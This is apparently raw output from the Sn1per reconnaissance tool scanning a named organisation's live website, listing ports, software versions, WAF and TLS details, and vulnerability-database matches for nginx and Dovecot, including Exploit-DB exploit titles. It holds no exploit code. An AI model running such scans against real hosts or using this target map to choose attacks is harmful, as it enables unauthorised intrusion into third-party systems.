1356| [35767] Dovecot ACL plugin security bypass
1357| [34082] Dovecot mbox-storage.c directory traversal
1358| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
1359| [26578] Cyrus IMAP pop3d buffer overflow
1360| [26536] Dovecot IMAP LIST information disclosure
1361| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
1362| [24709] Dovecot APPEND command denial of service
1363| [13018] akpop3d authentication code SQL injection
1364| [7345] Slackware Linux imapd and ipop3d core dump
1365| [6269] imap, ipop2d and ipop3d buffer overflows
1366| [5923] Linuxconf vpop3d symbolic link
1367| [4918] IPOP3D, Buffer overflow attack
1368| [1560] IPOP3D, user login successful
1369| [1559] IPOP3D user login to remote host successful
1370| [1525] IPOP3D, user logout
1371| [1524] IPOP3D, user auto-logout
1372| [1523] IPOP3D, user login failure
1373| [1522] IPOP3D, brute force attack
1374| [1521] IPOP3D, user kiss of death logout
1375| [418] pop3d mktemp creates insecure temporary files
1376|
1377| Exploit-DB - https://www.exploit-db.com:
1378| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
1379| [23053] Vpop3d Remote Denial of Service Vulnerability
1380| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
1381| [11893] tPop3d 1.5.3 DoS
1382| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
1383| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
1384| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
1385| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
1386|
1387| OpenVAS (Nessus) - http://www.openvas.org:
1388| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
1389| [901025] Dovecot Version Detection
1390| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
1391| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
1392| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
1393| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
1394| [870607] RedHat Update for dovecot RHSA-2011:0600-01
1395| [870471] RedHat Update for dovecot RHSA-2011:1187-01
1396| [870153] RedHat Update for dovecot RHSA-2008:0297-02
1397| [863272] Fedora Update for dovecot FEDORA-2011-7612
1398| [863115] Fedora Update for dovecot FEDORA-2011-7258
1399| [861525] Fedora Update for dovecot FEDORA-2007-664
1400| [861394] Fedora Update for dovecot FEDORA-2007-493
1401| [861333] Fedora Update for dovecot FEDORA-2007-1485
1402| [860845] Fedora Update for dovecot FEDORA-2008-9202
1403| [860663] Fedora Update for dovecot FEDORA-2008-2475
1404| [860169] Fedora Update for dovecot FEDORA-2008-2464
1405| [860089] Fedora Update for dovecot FEDORA-2008-9232
1406| [840950] Ubuntu Update for dovecot USN-1295-1
1407| [840668] Ubuntu Update for dovecot USN-1143-1
1408| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
1409| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
1410| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
1411| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
1412| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
1413| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
1414| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
1415| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
1416| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
1417| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
1418| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
1419| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
1420| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
1421| [70259] FreeBSD Ports: dovecot
1422| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
1423| [66522] FreeBSD Ports: dovecot
1424| [65010] Ubuntu USN-838-1 (dovecot)
1425| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
1426| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
1427| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
1428| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
1429| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
1430| [62854] FreeBSD Ports: dovecot-managesieve
1431| [61916] FreeBSD Ports: dovecot
1432| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
1433| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
1434| [60528] FreeBSD Ports: dovecot
1435| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
1436| [60089] FreeBSD Ports: dovecot
1437| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
1438| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
1439|
1440| SecurityTracker - https://www.securitytracker.com:
1441| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
1442| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
1443| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
1444|
1445| OSVDB - http://www.osvdb.org:
1446| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
1447| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
1448| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
1449| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
1450| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
1451| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
1452| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
1453| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
1454| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
1455| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
1456| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
1457| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
1458| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
1459| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
1460| [66113] Dovecot Mail Root Directory Creation Permission Weakness
1461| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
1462| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
1463| [66110] Dovecot Multiple Unspecified Buffer Overflows
1464| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
1465| [64783] Dovecot E-mail Message Header Unspecified DoS
1466| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
1467| [62796] Dovecot mbox Format Email Header Handling DoS
1468| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
1469| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
1470| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
1471| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
1472| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
1473| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
1474| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
1475| [43137] Dovecot mail_extra_groups Symlink File Manipulation
1476| [42979] Dovecot passdbs Argument Injection Authentication Bypass
1477| [39876] Dovecot LDAP Auth Cache Security Bypass
1478| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
1479| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
1480| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
1481| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
1482| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
1483| [23281] Dovecot imap/pop3-login dovecot-auth DoS
1484| [23280] Dovecot Malformed APPEND Command DoS
1485| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
1486| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
1487| [5857] Linux pop3d Arbitrary Mail File Access
1488| [2471] akpop3d username SQL Injection
1489|_
1490Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1491Aggressive OS guesses: Linux 3.10 - 3.12 (98%), Linux 4.4 (98%), Linux 3.18 (98%), Linux 2.6.32 (97%), Linux 2.6.35 (97%), Linux 2.6.39 (97%), Linux 3.10 (97%), Linux 3.4 (97%), Linux 3.5 (97%), Linux 3.7 (97%)
1492No exact OS matches for host (test conditions non-ideal).
1493
1494TRACEROUTE
1495HOP RTT ADDRESS
14961 128.21 ms box6011.bluehost.com (216.172.168.193)
1497
1498OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1499Nmap done: 1 IP address (1 host up) scanned in 245.16 seconds
 + -- --=[Port 111 closed... skipping.
 + -- --=[Port 123 closed... skipping.
 + -- --=[Port 135 closed... skipping.
 + -- --=[Port 137 closed... skipping.
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 161 closed... skipping.
 + -- --=[Port 162 closed... skipping.
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 443 opened... running tests...
====================================================================================
 RUNNING NMAP HTTP SCRIPTS
====================================================================================
1512Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:36 UTC
1513NSE: Loaded 164 scripts for scanning.
1514NSE: Script Pre-scanning.
1515Initiating NSE at 13:36
1516Completed NSE at 13:36, 0.00s elapsed
1517Initiating NSE at 13:36
1518Completed NSE at 13:36, 0.00s elapsed
1519Initiating Parallel DNS resolution of 1 host. at 13:36
1520Completed Parallel DNS resolution of 1 host. at 13:36, 0.08s elapsed
1521Initiating SYN Stealth Scan at 13:36
1522Scanning www.rhkpa.org (216.172.168.193) [1 port]
1523Discovered open port 443/tcp on 216.172.168.193
1524Completed SYN Stealth Scan at 13:36, 0.16s elapsed (1 total ports)
1525Initiating Service scan at 13:36
1526Scanning 1 service on www.rhkpa.org (216.172.168.193)
1527Completed Service scan at 13:36, 14.14s elapsed (1 service on 1 host)
1528Initiating OS detection (try #1) against www.rhkpa.org (216.172.168.193)
1529Retrying OS detection (try #2) against www.rhkpa.org (216.172.168.193)
1530NSE: Script scanning 216.172.168.193.
1531Initiating NSE at 13:36
1532NSE Timing: About 36.01% done; ETC: 13:38 (0:00:55 remaining)
1533NSE Timing: About 67.24% done; ETC: 13:38 (0:00:40 remaining)
1534NSE: [http-wordpress-enum 216.172.168.193:443] got no answers from pipelined queries
1535Completed NSE at 13:46, 546.50s elapsed
1536Initiating NSE at 13:46
1537Completed NSE at 13:46, 6.64s elapsed
1538Nmap scan report for www.rhkpa.org (216.172.168.193)
1539Host is up (0.091s latency).
1540rDNS record for 216.172.168.193: box6011.bluehost.com
1541
1542PORT STATE SERVICE VERSION
1543443/tcp open ssl/http nginx 1.14.1
1544| http-brute:
1545|_ Path "/" does not require authentication
1546|_http-chrono: Request times for /; avg: 22383.85ms; min: 22363.53ms; max: 22426.19ms
1547|_http-csrf: Couldn't find any CSRF vulnerabilities.
1548|_http-date: Wed, 02 Oct 2019 13:37:11 GMT; -55s from local time.
1549|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
1550|_http-dombased-xss: Couldn't find any DOM based XSS.
1551| http-errors:
1552| Spidering limited to: maxpagecount=40; withinhost=www.rhkpa.org
1553| Found the following error pages:
1554|
1555| Error Code: 400
1556|_ http://www.rhkpa.org:443/
1557|_http-feed: Couldn't find any feeds.
1558|_http-fetch: Please enter the complete path of the directory to save data in.
1559| http-headers:
1560| Server: nginx/1.14.1
1561| Date: Wed, 02 Oct 2019 13:37:11 GMT
1562| Content-Type: text/html
1563| Content-Length: 271
1564| Connection: close
1565|
1566|_ (Request type: GET)
1567|_http-jsonp-detection: Couldn't find any JSONP endpoints.
1568|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
1569|_http-mobileversion-checker: No mobile version detected.
1570| http-security-headers:
1571| Strict_Transport_Security:
1572|_ HSTS not configured in HTTPS Server
1573|_http-server-header: nginx/1.14.1
1574| http-sitemap-generator:
1575| Directory structure:
1576| Longest directory structure:
1577| Depth: 0
1578| Dir: /
1579| Total files found (by extension):
1580|_
1581|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
1582|_http-title: 400 The plain HTTP request was sent to HTTPS port
1583|_http-traceroute: ERROR: Script execution failed (use -d to debug)
1584| http-vhosts:
1585| 31 names had status 301
1586|_96 names had status ERROR
1587|_http-xssed: No previously reported XSS vuln.
1588| vulscan: VulDB - https://vuldb.com:
1589| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
1590| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
1591| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
1592|
1593| MITRE CVE - https://cve.mitre.org:
1594| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
1595| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
1596| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
1597| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
1598| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
1599| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
1600|
1601| SecurityFocus - https://www.securityfocus.com/bid/:
1602| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
1603| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
1604| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
1605| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
1606| [82230] nginx Multiple Denial of Service Vulnerabilities
1607| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
1608| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
1609| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
1610| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
1611| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
1612| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
1613| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
1614| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
1615| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
1616| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
1617| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
1618| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
1619| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
1620| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
1621| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
1622| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
1623| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
1624| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
1625| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
1626| [40420] nginx Directory Traversal Vulnerability
1627| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
1628| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
1629| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
1630| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
1631| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
1632|
1633| IBM X-Force - https://exchange.xforce.ibmcloud.com:
1634| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
1635| [84172] nginx denial of service
1636| [84048] nginx buffer overflow
1637| [83923] nginx ngx_http_close_connection() integer overflow
1638| [83688] nginx null byte code execution
1639| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
1640| [82319] nginx access.log information disclosure
1641| [80952] nginx SSL spoofing
1642| [77244] nginx and Microsoft Windows request security bypass
1643| [76778] Naxsi module for Nginx nx_extract.py directory traversal
1644| [74831] nginx ngx_http_mp4_module.c buffer overflow
1645| [74191] nginx ngx_cpystrn() information disclosure
1646| [74045] nginx header response information disclosure
1647| [71355] nginx ngx_resolver_copy() buffer overflow
1648| [59370] nginx characters denial of service
1649| [59369] nginx DATA source code disclosure
1650| [59047] nginx space source code disclosure
1651| [58966] nginx unspecified directory traversal
1652| [54025] nginx ngx_http_parse.c denial of service
1653| [53431] nginx WebDAV component directory traversal
1654| [53328] Nginx CRC-32 cached domain name spoofing
1655| [53250] Nginx ngx_http_parse_complex_uri() function code execution
1656|
1657| Exploit-DB - https://www.exploit-db.com:
1658| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
1659| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
1660| [25499] nginx 1.3.9-1.4.0 DoS PoC
1661|
1662| OpenVAS (Nessus) - http://www.openvas.org:
1663| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
1664| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
1665| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
1666| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
1667| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
1668| [64869] Debian Security Advisory DSA 1884-1 (nginx)
1669|
1670| SecurityTracker - https://www.securitytracker.com:
1671| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
1672| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
1673| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
1674| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
1675|
1676| OSVDB - http://www.osvdb.org:
1677| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
1678| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
1679| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
1680| [92796] nginx ngx_http_close_connection Function Crafted r->
1681| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
1682| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
1683| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
1684| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
1685| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
1686| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
1687| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
1688| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
1689| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
1690| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
1691| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
1692| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
1693| [62617] nginx Internal DNS Cache Poisoning Weakness
1694| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
1695| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
1696| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
1697| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
1698| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
1699| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
1700| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
1701| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
1702| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
1703| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
1704|_
1705Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1706Aggressive OS guesses: Linux 2.6.32 (97%), Linux 2.6.35 (97%), Linux 3.10 (97%), Linux 3.5 (97%), Linux 3.7 (97%), Linux 4.2 (97%), Linux 4.4 (97%), Synology DiskStation Manager 5.1 (97%), WatchGuard Fireware 11.8 (97%), Tandberg VCS video conferencing system (97%)
1707No exact OS matches for host (test conditions non-ideal).
1708Uptime guess: 7.445 days (since Wed Sep 25 03:04:48 2019)
1709TCP Sequence Prediction: Difficulty=262 (Good luck!)
1710IP ID Sequence Generation: All zeros
1711
1712TRACEROUTE
1713HOP RTT ADDRESS
17141 91.41 ms box6011.bluehost.com (216.172.168.193)
1715
1716NSE: Script Post-scanning.
1717Initiating NSE at 13:46
1718Completed NSE at 13:46, 0.00s elapsed
1719Initiating NSE at 13:46
1720Completed NSE at 13:46, 0.00s elapsed
1721Read data files from: /usr/bin/../share/nmap
1722OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1723Nmap done: 1 IP address (1 host up) scanned in 576.50 seconds
1724 Raw packets sent: 83 (7.456KB) | Rcvd: 24 (1.980KB)
====================================================================================
 CHECKING FOR WAF
====================================================================================
WAFW00F - Web Application Firewall Detection Tool

Checking https://www.rhkpa.org
The site https://www.rhkpa.org is behind ModSecurity (SpiderLabs) WAF.
Number of requests: 5

====================================================================================
 GATHERING HTTP INFO
====================================================================================
https://www.rhkpa.org [200 OK] Cookies[MAILPOET_SESSION,PHPSESSID,pmpro_visit], Country[UNITED STATES][US], HTML5, HTTPServer[nginx/1.14.1], IP[216.172.168.193], JQuery[5.2.3], MetaGenerator[WordPress Download Manager 3.0.2], PoweredBy[Paid], Script[text/javascript], Title[RHKPA | Royal Hong Kong Police Association], UncommonHeaders[link,x-et-api-version,x-et-api-root,x-et-api-origin,x-tec-api-version,x-tec-api-root,x-tec-api-origin,x-server-cache,x-proxy-cache], WordPress, nginx[1.14.1]
====================================================================================
 GATHERING SERVER INFO
====================================================================================

wig - WebApp Information Gatherer

====================================================================================
 CHECKING HTTP HEADERS
====================================================================================
====================================================================================
 GATHERING WEB FINGERPRINT
====================================================================================
 PHP
 Bootstrap
 Nginx 1.14.1
 WooCommerce 3.7.0
 jQuery Migrate
 WordPress
 Google Font API
 jQuery 1.12.4
 X-ET-API-VERSION: v1
 X-ET-API-ROOT: https://www.rhkpa.org/wp-json/tribe/tickets/v1/
 X-ET-API-ORIGIN: https://www.rhkpa.org
 X-TEC-API-VERSION: v1
 X-TEC-API-ROOT: https://www.rhkpa.org/wp-json/tribe/events/v1/
 X-TEC-API-ORIGIN: https://www.rhkpa.org
 X-Server-Cache: true
 X-Proxy-Cache: MISS
====================================================================================
 DISPLAYING META GENERATOR TAGS
====================================================================================
====================================================================================
 DISPLAYING COMMENTS
====================================================================================
====================================================================================
 DISPLAYING SITE LINKS
====================================================================================
====================================================================================
 GATHERING SSL/TLS INFO
====================================================================================
Version: 1.11.13-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 216.172.168.193

Testing SSL server www.rhkpa.org on port 443 using SNI name www.rhkpa.org

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  rhkpa.org
Altnames: DNS:new.rhkpa.org, DNS:old.rhkpa.org, DNS:rhkpa.org, DNS:www.new.rhkpa.org, DNS:www.old.rhkpa.org, DNS:www.rhkpa.org
Issuer:   Let's Encrypt Authority X3

Not valid before: Sep 11 07:45:34 2019 GMT
Not valid after:  Dec 10 07:45:34 2019 GMT

====================================================================================
 SAVING SCREENSHOTS
====================================================================================
[+] Screenshot saved to /usr/share/sniper/loot/workspace/www.rhkpa.org/screenshots/www.rhkpa.org-port443.jpg
webscreenshot.py version 2.2.1

[+] 1 URLs to be screenshot
[ERROR][https://www.rhkpa.org:443] renderer binary could not have been found in your current PATH environment variable, exiting
[+] 0 actual URLs screenshot
[+] 1 error(s)
    https://www.rhkpa.org:443
 + -- --=[Port 445 closed... skipping.
 + -- --=[Port 500 closed... skipping.
 + -- --=[Port 512 closed... skipping.
 + -- --=[Port 513 closed... skipping.
 + -- --=[Port 514 closed... skipping.
 + -- --=[Port 1099 closed... skipping.
 + -- --=[Port 1433 closed... skipping.
 + -- --=[Port 2049 closed... skipping.
 + -- --=[Port 3306 closed... skipping.
 + -- --=[Port 3310 closed... skipping.
 + -- --=[Port 3128 closed... skipping.
 + -- --=[Port 3389 closed... skipping.
 + -- --=[Port 3632 closed... skipping.
 + -- --=[Port 5432 closed... skipping.
 + -- --=[Port 5555 closed... skipping.
 + -- --=[Port 5800 closed... skipping.
 + -- --=[Port 5900 closed... skipping.
 + -- --=[Port 5984 closed... skipping.
 + -- --=[Port 6000 closed... skipping.
 + -- --=[Port 6667 closed... skipping.
 + -- --=[Port 7001 closed... skipping.
 + -- --=[Port 8000 closed... skipping.
 + -- --=[Port 9495 closed... skipping.
 + -- --=[Port 10000 closed... skipping.
 + -- --=[Port 16992 closed... skipping.
 + -- --=[Port 27017 closed... skipping.
 + -- --=[Port 27018 closed... skipping.
 + -- --=[Port 27019 closed... skipping.
 + -- --=[Port 28017 closed... skipping.
 + -- --=[Port 49180 closed... skipping.
====================================================================================
 SCANNING FOR COMMON VULNERABILITIES
====================================================================================
====================================================================================
 SKIPPING FULL NMAP PORT SCAN
====================================================================================
====================================================================================
 SKIPPING BRUTE FORCE
====================================================================================
====================================================================================
 SCAN COMPLETE!
====================================================================================
[*] Opening loot directory /usr/share/sniper/loot/workspace/www.rhkpa.org [OK]
 + -- --=[Starting Metasploit service...
[i] Database already started
 + -- --=[Importing NMap XML files into Metasploit...
[-] ***
[-] * WARNING: No database support: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host "localhost" (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

[-] ***
       =[ metasploit v5.0.50-dev ]
+ -- --=[ 1928 exploits - 1077 auxiliary - 332 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

[-] Database not connected
 + -- --=[Generating reports...
[]
 + -- --=[Sorting all domains...
 + -- --=[Removing blank screenshots...
 + -- --=[Sn1per Professional is not installed. To download Sn1per Professional, go to https://xerosecurity.com.
 + -- --=[Done!